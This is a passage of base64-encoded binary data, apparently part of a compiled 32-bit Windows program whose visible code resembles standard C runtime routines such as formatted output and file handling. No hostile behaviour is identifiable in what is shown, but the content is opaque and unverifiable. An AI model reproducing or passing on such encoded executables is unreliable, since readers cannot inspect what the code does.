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gjB6AReiYXM+///O8YPhDP///+D+AcPh90JAAD/JIWfgkAAM8CDjfT7////iYWk+///iYWw+///iYXU+///iYXc+///iYX4+///iYXY+///6bAJAAAPt8GD6CB0SIPoA3Q0K8Z0JCvCdBSD6AMPhYYJAAAJtfj7///phwkAAION+Pv//wTpewkAAION+Pv//wHpbwkAAIGN+Pv//4AAAADpYAkAAAmV+Pv//+lVCQAAZoP5KnUriwODwwSJnej7//+JhdT7//+FwA+NNgkAAION+Pv//wT3ndT7///pJAkAAIuF1Pv//2vACg+3yY1ECNCJhdT7///pCQkAAIOl9Pv//wDp/QgAAGaD+Sp1JYsDg8MEiZ3o+///iYX0+///hcAPjd4IAACDjfT7////6dIIAACLhfT7//9rwAoPt8mNRAjQiYX0+///6bcIAAAPt8GD+El0UYP4aHRAg/hsdBiD+HcPhZwIAACBjfj7//8ACAAA6Y0IAABmgz9sdRED+oGN+Pv//wAQAADpdggAAION+Pv//xDpaggAAION+Pv//yDpXggAAA+3B2aD+DZ1GWaDfwI0dRKDxwSBjfj7//8AgAAA6TwIAABmg/gzdRlmg38CMnUSg8cEgaX4+////3///+kdCAAAZoP4ZA+EEwgAAGaD+GkPhAkIAABmg/hvD4T/BwAAZoP4dQ+E9QcAAGaD+HgPhOsHAABmg/hYD4ThBwAAg6XM+///AIuFxPv//1GNteD7///Hhdj7//8BAAAA6Oz7//9Z6bgHAAAPt8GD+GQPjzACAAAPhL0CAACD+FMPjxsBAAB0foPoQXQQK8J0WSvCdAgrwg+F7AUAAIPBIMeFpPv//wEAAACJjeT7//+Djfj7//9Ag730+///AI21/Pv//7gAAgAAibXw+///iYXs+///D42NAgAAx4X0+///BgAAAOnpAgAA94X4+///MAgAAA+FyQAAAION+Pv//yDpvQAAAPeF+Pv//zAIAAB1B4ON+Pv//yCLvfT7//+D//91Bb////9/g8ME9oX4+///IImd6Pv//4tb/Imd8Pv//w+EBQUAAIXbdQuhOBxBAImF8Pv//4Ol7Pv//wCLtfD7//+F/w+OHQUAAIoGhMAPhBMFAACNjbT7//8PtsBRUOiA+v//WVmFwHQBRkb/hez7//85vez7//980OnoBAAAg+hYD4TwAgAAK8IPhJUAAACD6AcPhPX+//8rwg+FxgQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+Jnej7//+JhZz7//90QoiFyPv//42FtPv//1CLhbT7///Ghcn7//8A/7CsAAAAjYXI+///UI2F/Pv//1Dou/j//4PEEIXAfQ+JtbD7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pQgQAAIsDg8MEiZ3o+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6f0DAACDpdj7//8A6fMDAAChOBxBAImF8Pv//1Doqff//1np3AMAAIP4cA+P9gEAAA+E3gEAAIP4ZQ+MygMAAIP4Zw+O6P3//4P4aXRtg/hudCSD+G8Pha4DAAD2hfj7//+AibXk+///dGGBjfj7//8AAgAA61WLM4PDBImd6Pv//+gj9///hcAPhFb6///2hfj7//8gdAxmi4Xg+///ZokG6wiLheD7//+JBseFsPv//wEAAADpwQQAAION+Pv//0DHheT7//8KAAAA94X4+///AIAAAA+EqwEAAAPei0P4i1P86ecBAAB1EmaD+Wd1Y8eF9Pv//wEAAADrVzmF9Pv//34GiYX0+///gb30+///owAAAH49i730+///gcddAQAAV+ii9f//WYuN5Pv//4mFqPv//4XAdBCJhfD7//+Jvez7//+L8OsKx4X0+///owAAAIsDg8MIiYWU+///i0P8iYWY+///jYW0+///UP+1pPv//w++wf+19Pv//4md6Pv//1D/tez7//+NhZT7//9WUP81WBxBAOhC4f//Wf/Qi534+///g8QcgeOAAAAAdCGDvfT7//8AdRiNhbT7//9QVv81ZBxBAOgS4f//Wf/QWVlmg73k+///Z3Uchdt1GI2FtPv//1BW/zVgHEEA6Ozg//9Z/9BZWYA+LXURgY34+///AAEAAEaJtfD7//9W6Qj+//+JtfT7///Hhaz7//8HAAAA6ySD6HMPhGr8//8rwg+Eiv7//4PoAw+FyQEAAMeFrPv//ycAAAD2hfj7//+Ax4Xk+///EAAAAA+Eav7//2owWGaJhdD7//+Lhaz7//+DwFFmiYXS+///iZXc+///6UX+///3hfj7//8AEAAAD4VF/v//g8ME9oX4+///IHQc9oX4+///QImd6Pv//3QGD79D/OsED7dD/JnrF/aF+Pv//0CLQ/x0A5nrAjPSiZ3o+///9oX4+///QHQbhdJ/F3wEhcBzEffYg9IA99qBjfj7//8AAQAA94X4+///AJAAAIvai/h1AjPbg730+///AH0Mx4X0+///AQAAAOsag6X4+///97gAAgAAOYX0+///fgaJhfT7//+LxwvDdQYhhdz7//+Ntfv9//+LhfT7////jfT7//+FwH8Gi8cLw3Qti4Xk+///mVJQU1fouKf//4PBMIP5OYmdkPv//4v4i9p+BgONrPv//4gOTuu9jYX7/f//K8ZG94X4+///AAIAAImF7Pv//4m18Pv//3RZhcB0B4vOgDkwdE7/jfD7//+LjfD7///GATBA6zaF23ULoTwcQQCJhfD7//+LhfD7///Hhdj7//8BAAAA6wlPZoM4AHQGA8KF/3XzK4Xw+///0fiJhez7//+DvbD7//8AD4VlAQAAi4X4+///qEB0K6kAAQAAdARqLesOqAF0BGor6waoAnQUaiBYZomF0Pv//8eF3Pv//wEAAACLndT7//+Ltez7//8r3iud3Pv///aF+Pv//wx1F/+1xPv//42F4Pv//1NqIOiE9f//g8QM/7Xc+///i73E+///jYXg+///jY3Q+///6Iv1///2hfj7//8IWXQb9oX4+///BHUSV1NqMI2F4Pv//+hC9f//g8QMg73Y+///AHV1hfZ+cYu98Pv//4m15Pv///+N5Pv//42FtPv//1CLhbT7////sKwAAACNhZz7//9XUOhV8///g8QQiYWQ+///hcB+Kf+1nPv//4uFxPv//4214Pv//+it9P//A72Q+///g73k+///AFl/puscg43g+////+sTi43w+///Vo2F4Pv//+jW9P//WYO94Pv//wB8IPaF+Pv//wR0F/+1xPv//42F4Pv//1NqIOiI9P//g8QMg72o+///AHQT/7Wo+///6MDN//+Dpaj7//8AWYu9oPv//4ud6Pv//w+3BzP2iYXk+///ZjvGdAeLyOmh9f//ObXM+///dA2Dvcz7//8HD4VQ9f//gL3A+///AHQKi4W8+///g2Bw/YuF4Pv//4tN/F9eM81b6CWW///Jw4v/b3pAAGd4QACZeEAA9HhAAEB5QABMeUAAknlAAJF6QACL/1WL7GaLRQhmg/gwcwe4/////13DZoP4OnMID7fAg+gwXcO5EP8AAIvRZjvCD4OUAQAAuWAGAACL0WY7wg+CkgEAAIPCCmY7wnMHD7fAK8Fdw7nwBgAAi9FmO8IPgnMBAACDwgpmO8Jy4blmCQAAi9FmO8IPglsBAACDwgpmO8JyybnmCQAAi9FmO8IPgkMBAACDwgpmO8JysblmCgAAi9FmO8IPgisBAACDwgpmO8JymbnmCgAAi9FmO8IPghMBAACDwgpmO8JygblmCwAAi9FmO8IPgvsAAACDwgpmO8IPgmX///+5ZgwAAIvRZjvCD4LfAAAAg8IKZjvCD4JJ////ueYMAACL0WY7wg+CwwAAAIPCCmY7wg+CLf///7lmDQAAi9FmO8IPgqcAAACDwgpmO8IPghH///+5UA4AAIvRZjvCD4KLAAAAg8IKZjvCD4L1/v//udAOAACL0WY7wnJzg8IKZjvCD4Ld/v//g8FQi9FmO8JyXboqDwAAZjvCD4LF/v//uUAQAACL0WY7wnJDg8IKZjvCD4Kt/v//ueAXAACL0WY7wnIrg8IKZjvCD4KV/v//g8Ewi9FmO8JyFboaGAAA6wW6Gv8AAGY7wg+Cdv7//4PI/13Di/9Vi+y4//8AAIPsFGY5RQh1BoNl/ADrZbgAAQAAZjlFCHMaD7dFCIsNtB1BAGaLBEFmI0UMD7fAiUX860D/dRCNTezo5qT//4tF7P9wFP9wBI1F/FBqAY1FCFCNRexqAVDohzsAAIPEHIXAdQMhRfyAffgAdAeLRfSDYHD9D7dF/A+3TQwjwcnDzMzMzMzMzMzMzMzMi0QkCItMJBALyItMJAx1CYtEJAT34cIQAFP34YvYi0QkCPdkJBQD2ItEJAj34QPTW8IQAGoQaFD8QADoLK7//zPbiV3kagHoAwIAAFmJXfxqA1+JfeA7PcA8QQB9V4v3weYCobwsQQADxjkYdESLAPZADIN0D1Do0Jz//1mD+P90A/9F5IP/FHwoobwsQQCLBAaDwCBQ/xWs4EAAobwsQQD/NAboHMr//1mhvCxBAIkcBkfrnsdF/P7////oCQAAAItF5Ojorf//w2oB6KQAAABZw4v/Vlcz9r/wKEEAgzz1dBxBAAF1Ho0E9XAcQQCJOGigDwAA/zCDxxjoLQsAAFlZhcB0DEaD/iR80jPAQF9ew4Mk9XAcQQAAM8Dr8Yv/U4sdrOBAAFa+cBxBAFeLPoX/dBODfgQBdA1X/9NX6ILJ//+DJgBZg8YIgf6QHUEAfNy+cBxBAF+LBoXAdAmDfgQBdQNQ/9ODxgiB/pAdQQB85l5bw4v/VYvsi0UI/zTFcBxBAP8VWOBAAF3DagxocPxAAOjUrP//M/9HiX3kM9s5HaQoQQB1GOhz0P//ah7owc7//2j/AAAA6APM//9ZWYt1CI009XAcQQA5HnQEi8frbmoY6Gfs//9Zi/g7+3UP6Gig///HAAwAAAAzwOtRagroWQAAAFmJXfw5HnUsaKAPAABX6CQKAABZWYXAdRdX6LDI//9Z6DKg///HAAwAAACJXeTrC4k+6wdX6JXI//9Zx0X8/v///+gJAAAAi0Xk6Gys///DagroKP///1nDi/9Vi+yLRQhWjTTFcBxBAIM+AHUTUOgi////WYXAdQhqEej3yv//Wf82/xVU4EAAXl3Di/9Vi+yD7DRTM9v2RRCAVleL8Ild4Ihd/sdFzAwAAACJXdB0CYld1MZF/xDrCsdF1AEAAACIXf+NReBQ6EU7AABZhcB0DVNTU1NT6Oud//+DxBSLTRC4AIAAAIXIdRH3wQBABwB1BTlF4HQEgE3/gIvBg+ADK8O6AAAAwL8AAACAdEdIdC5IdCboUJ///4kYgw7/6DOf//9qFl5TU1NTU4kw6Lye//+DxBTpAQUAAIlV+OsZ9sEIdAj3wQAABwB17sdF+AAAAEDrA4l9+ItFFGoQWSvBdDcrwXQqK8F0HSvBdBCD6EB1oTl9+A+UwIlF8Osex0XwAwAAAOsVx0XwAgAAAOsMx0XwAQAAAOsDiV3wi0UQugAHAAAjwrkABAAAO8G/AAEAAH87dDA7w3QsO8d0Hz0AAgAAD4SUAAAAPQADAAAPhUD////HRewCAAAA6y/HRewEAAAA6ybHRewDAAAA6x09AAUAAHQPPQAGAAB0YDvCD4UP////x0XsAQAAAItFEMdF9IAAAACFx3QWiw08I0EA99EjTRiEyXgHx0X0AQAAAKhAdBKBTfQAAAAEgU34AAABAINN8ASpABAAAHQDCX30qCB0EoFN9AAAAAjrFMdF7AUAAADrpqgQdAeBTfQAAAAQ6O8MAACJBoP4/3Ua6Oed//+JGIMO/+jKnf//xwAYAAAA6Y4AAACLRQiLPfTgQABT/3X0xwABAAAA/3XsjUXMUP918P91+P91DP/XiUXkg/j/dW2LTfi4AAAAwCPIO8h1K/ZFEAF0JYFl+P///39T/3X0jUXM/3XsUP918P91+P91DP/XiUXkg/j/dTSLNovGwfgFiwSFoCtBAIPmH8HmBo1EMASAIP7/FRjgQABQ6Fid//9Z6Cyd//+LAOl1BAAA/3Xk/xWk4EAAO8N1RIs2i8bB+AWLBIWgK0EAg+YfweYGjUQwBIAg/v8VGOBAAIvwVugVnf//Wf915P8VJOBAADvzdbDo3Jz//8cADQAAAOujg/gCdQaATf9A6wmD+AN1BIBN/wj/deT/NuiACQAAiwaL0IPgH8H6BYsUlaArQQBZweAGWYpN/4DJAYhMAgSLBovQg+AfwfoFixSVoCtBAMHgBo1EAiSAIICITf2AZf1IiE3/D4WBAAAA9sGAD4SyAgAA9kUQAnRyagKDz/9X/zbosav//4PEDIlF6DvHdRnoU5z//4E4gwAAAHRO/zboN8X//+n6/v//agGNRdxQ/zaJXdzoXLH//4PEDIXAdRtmg33c